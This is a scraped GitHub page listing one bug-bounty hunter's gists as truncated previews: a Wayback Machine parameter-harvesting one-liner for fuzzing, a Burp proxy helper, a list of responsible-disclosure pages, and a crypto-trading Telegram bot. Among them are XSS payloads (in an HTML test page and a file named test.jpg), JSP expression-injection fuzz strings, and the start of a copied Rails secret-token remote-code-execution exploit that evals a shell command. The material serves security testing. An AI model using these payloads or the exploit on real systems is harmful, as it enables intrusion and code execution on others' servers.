Skip to content

Instantly share code, notes, and snippets.

🏠
Programming..............................................................

Arbaz Hussain arbazkiraak

🏠
Programming..............................................................
Block or report user

Report or block arbazkiraak

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@arbazkiraak
arbazkiraak / gist:4defc9a0262c2ab115a996f3496be022
Created Apr 16, 2020 — forked from Screetsec/gist:6ee948503960f1b9d4b7b8465aea2d73
One Liner to get Hidden URL Parameter from Passive scan using Web Archive. Regex using DFA Engine, Support and Collecting URL with multi Parameter to Fuzzing & Removing Duplicate
View gist:4defc9a0262c2ab115a996f3496be022
curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt
View send_urls_to_burp
#!/usr/bin/python3
import requests,sys
import urllib3,queue,threading
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
urls_inp = sys.argv[1]
View bbprograms.txt
google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue
@arbazkiraak
arbazkiraak / phantonjs-xss.html
Last active Sep 15, 2019 — forked from yeukhon/test.html
Simple XSS detector using PhantomJS
View phantonjs-xss.html
<html>
<head></head>
<body>
<a href="javascript: alert('clicked xss link')" id="link">click me</a>
<img src="xx" onerror="alert('xss')" />
</body>
</html>
View rails-secret-token-rce.rb
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
"\x04\x08" +
"o" +
@arbazkiraak
arbazkiraak / test.jpg
Created Apr 11, 2019
nothing'>"/><ScRipt>prompt(1)</ScRipt>
View test.jpg
nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>
View offsets
[array('i', [143, 150]),
array('i', [207, 214]),
array('i', [753, 760]),
array('i', [931, 938]),
array('i', [1140, 1147]),
array('i', [1390, 1397]),
array('i', [1543, 1550]),
array('i', [1666, 1673]),
array('i', [1950, 1957]),
array('i', [4193, 4200]),
View gist:77bb058366e5d646cf4f58869e4da190
from burp import IBurpExtender,IProxyListener
class BurpExtender(IBurpExtender,IProxyListener):
def registerExtenderCallbacks(self,callbacks):
self._helpers = callbacks.getHelpers()
self._callbacks = callbacks
self._callbacks.setExtensionName("IProxyListener Params")
self._callbacks.registerProxyListener(self)
def processProxyMessage(self,messageIsRequest,message):
View jsp-jstl-intruders.txt
${0 }
${0 == pageList.maxPage}
${1}
${1 eq currentPageNumber }
${5}
${5/6}
${a+1 }
${a.academyName}
${a.academyNumber}
${academyNumber==a.academyNumber}
@arbazkiraak
arbazkiraak / CryptoBot.py
Last active Sep 10, 2018
Telegram Bot to automate basics of Crypto Trading
View CryptoBot.py
import requests,json,bs4,time,threading,datetime,logging
from binance.client import Client
requests.packages.urllib3.disable_warnings()
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext.dispatcher import run_async
########### KEYS #######################
updater = Updater(token='<TELEGRAM-TOKEN>')
dispatcher = updater.dispatcher
You can’t perform that action at this time.